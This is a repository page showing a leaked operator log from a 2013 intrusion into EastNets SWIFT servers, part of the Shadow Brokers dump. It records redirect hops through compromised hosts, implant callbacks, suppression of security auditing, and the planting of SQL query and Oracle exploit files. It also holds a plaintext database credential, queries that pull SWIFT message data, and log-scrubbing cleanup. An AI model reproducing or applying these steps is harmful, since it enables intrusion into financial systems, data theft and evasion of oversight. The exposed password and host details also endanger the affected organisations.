sneedmca/shadowbrokers-exploits
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
shadowbrokers-exploits/swift/DSL2opnotes.txt
Donncha O'Cearbhaill 7f640a83d4 Inital commit of Shadowbrokers 'Lost in Translation' release
2017-04-14 11:45:07 +02:00

210 lines
No EOL
6.4 KiB
Text
Raw Blame History

ISP: LK
City:
Phone:
ISP IP: 89.185.234.145
Source IP:
FINAL target IP:
Ops Machine: LOCALHOST.LOCALDOMAIN
Redirecting Method 1: PITCHIMPAIR
Redirect Host 1: 133.94.1.3
Redirect Target 1: 192.168.208.11
Redirecting Method 2: INCISION
Redirect Host 2: 192.168.208.11
Redirect Target 2: 192.168.200.52
Redirecting Method 3: INCISION
Redirect Host 3: 192.168.208.11
Redirect Target 3: 192.168.200.86
BEGIN UNIX OPNOTES:
Targets (IP, full domain name, target tags: pitchimpair unsuccessful not_attempted ) :
--> 133.94.1.3 cis.cc.kurume-it.ac.jp pitchimpair unix successful
---> 192.168.208.11 ensbdmgmt2.eastnets.com jeepflea_market windows successful
----> 192.168.200.52 ensbdsl2.eastnets.com jeepflea_market windows successful
----> 192.168.200.86 ensbdnisl1.eastnets.com jeepflea_market windows successful
Ops Machine: WO
Results:
PROJECT=JEEPFLEA_MARKET
OPUSER=37322
OPSCHEDULE=13050914490339
SCRUBVER=6.006000037
======================= P0
--- 133.94.1.3 --- cis
=======================
ourtn -eY5U /current/up/noserver -wBIN 133.94.1.3
2013-05-14 12:35:13 UTC -- on target
9:35pm up 33 day(s), 22:52, 0 users, load average: 0.00, 0.00, 0.00
User tty login@ idle JCPU PCPU what
Tue May 14 21:35:30 JST 2013
Tue May 14 12:35:30 GMT 2013
SunOS cis 5.10 Generic_142900-09 sun4u sparc SUNW,Sun-Fire-V250
-tunnel
r 44378 192.168.254.72 44378
2013-05-14 16:36:01 UTC -- burn
LOCALHOST.LOCALDOMAIN: scrubhands v. 6.006000037 20130514-1225
###################
SCRUBHANDS v6.006000037 (suite v6.6.0.37 run in /192.168.254.71) command line:
:
/usr/local/bin/scrubhands -t -S 13050914490339 -I 37322 -P JEEPFLEA_MARKET -n 8.8.8.8 89.185.234.145/240/158
###################
Final lines of bwmonitor.txt:
Tue May 14 16:38:39 UTC 2013
eth0 bytes (MB) packets kbps (kBps) kbps-1m kbps-10m kbps-hr
TX 10790208 (10.3) 33780 0.0 (0.0) 0.0 0.1 3.2
RX 20340406 (19.4) 35347 0.0 (0.0) 0.1 0.3 4.2
###################################################
PROJECT: JEEPFLEA_MARKET
DATE: 12:31 PM 05/14/2013
OPUSER: 37322
OPSCHEDULE: 13050914490339
#Op Status: Unsuccessful
#Non-Standard: True
###################################################
Targets:
Results:
#z0.0.0.11 = 192.168.208.11
#z0.0.0.12,z0.0.0.13 = 192.168.200.52
#z0.0.0.14,z0.0.0.15,z0.0.0.16 = 192.168.200.86
======================= T1
--- 192.168.208.11 --- ENSBDMGMT2
=======================
Win2k8 64bit R2
UR callback 44378
1:03 PM 5/14/2013 -- on target
Uptime:88 days, 14:46:22
Auditing:[2013-05-14 13:01:44 z0.0.0.11] Security auditing dorked, do not stop command 275 or you will lose your blessing
PSP:
12972 | 11452 | ------C:\Windows\system32\telnet.exe
dir -mask * -path c:\ -age 1h -recursive
prettych
quitanddelete
monitor packetredirect -listenport 3333 -raw
redirect -tcp -implantlisten 4426 -target 127.0.0.1 4426
4:26 PM 5/14/2013 -- BURNED
======================= T2
--- 192.168.200.52 --- ENSBDSL2
=======================
Win2k8 64 bit R2
1:25 PM 5/14/2013 PC2 target : 192.168.200.52
source : 192.168.200.11
final : 192.168.200.52
cb : 4378, 192.168.200.11
id : 0x100011b3c
key : jeepflea_market
ICMP : ICMP 8,0
Uptime:4 days, 16:6:5
Auditing:2013-05-14 13:30:17 z0.0.0.12] Security auditing dorked, do not stop command 798 or you will lose your blessing
PSP: Symantec Endpoint Protection 11
| 3756 | 560 | ------D:\Double-Take\DoubleTake.exe
grep -mask SPFILEACCESS.ORA -path D:\Alliance\Access\Database\database -pattern audit -nocase
cd c:\$Recycle.bin
put D:\DSZOPSDisk\Preps\swift_msg_queries_all.1368533247.sql -name C:\$Recycle.Bin\S-1-5-~1\$ICD12FA.txt
run -command "cmd.exe /q" -redirect
D:\alliance\access\database\bin\sqlplus.exe saauser/Aetq9f7CQtljCHtAmstCGF64C
1:59 PM 5/14/2013 -- disconnected when running the command
1:59 PM 5/14/2013 -- retriggered back on, checking logs
SQL>@$ICD12FA.txt
output file:$ICD12FB.txt
start:20130424
end:20130514
2:16 PM 5/14/2013 -- getting file
2:20 PM 5/14/2013 -- clean up
delete $ICD12FA.txt
delete $ICD12FB.txt
monitor packetredirect -listenport 3333 -raw
redirect -tcp -implantlisten 42316 -target 127.0.0.1 42316
dir -mask * -path c:\ -age 30m -recursive
prettych
quitanddelete
4:06 PM 5/14/2013 -- BURNED
======================= T2
--- 192.168.200.86 --- ENSBDNISL1
=======================
Win2k8 64 bit R2
2:31 PM 5/14/2013 PC2 target : 192.168.200.86
source : 192.168.200.11
final : 192.168.200.86
cb : 4639, 192.168.200.11
id : 0x1000125ae
key : jeepflea_market
ICMP : ICMP 8,0
Uptime:4 days, 16:7:18
Auditing:2013-05-14 14:37:03 z0.0.0.14] Security auditing dorked, do not stop command 1601 or you will lose your blessing
PSP: Symantec Endpoint Protection 11
grep -mask SPFILEACCESS.ORA -path D:\Alliance\Access\Database\database\ -pattern audit -nocase
3:03 PM 5/14/2013 -- EMAGENT.EXE not running, grep returned nothing
cd C:\$Recycle.Bin\S-1-5-~1
put D:\DSZOPSDisk\Preps\initial_oracle_exploit.1368537345.sql -name $ICD12FA.txt
lsnrctl status
3:31 PM 5/14/2013 -- looking for listener
LSNRCTL for 64-bit Windows: Version 11.2.0.1.0 - Production on 14-MAY-2013 19:29:17
Copyright (c) 1991, 2010, Oracle. All rights reserved.
Connecting to (ADDRESS=(PROTOCOL=tcp)(HOST=)(PORT=1521))
TNS-12541: TNS:no listener
TNS-12560: TNS:protocol adapter error
TNS-00511: No listener
64-bit Windows Error: 61: Unknown error
run -command "cmd.exe /q" -redirect
D:\alliance\access\database\bin\sqlplus.exe / as SYSDBA
3:19 PM 5/14/2013 -- failed to connect
SQL>@swift_msg_queries_all.sql
ERROR:
ORA-12560: TNS:protocol adapter error
dir -mask * -path c:\ -age 3h -recursive
prettych
eventlogsurvey
quitanddelete
4:08 PM 5/14/2013 -- BURNED
Reference in a new issue View git blame Copy permalink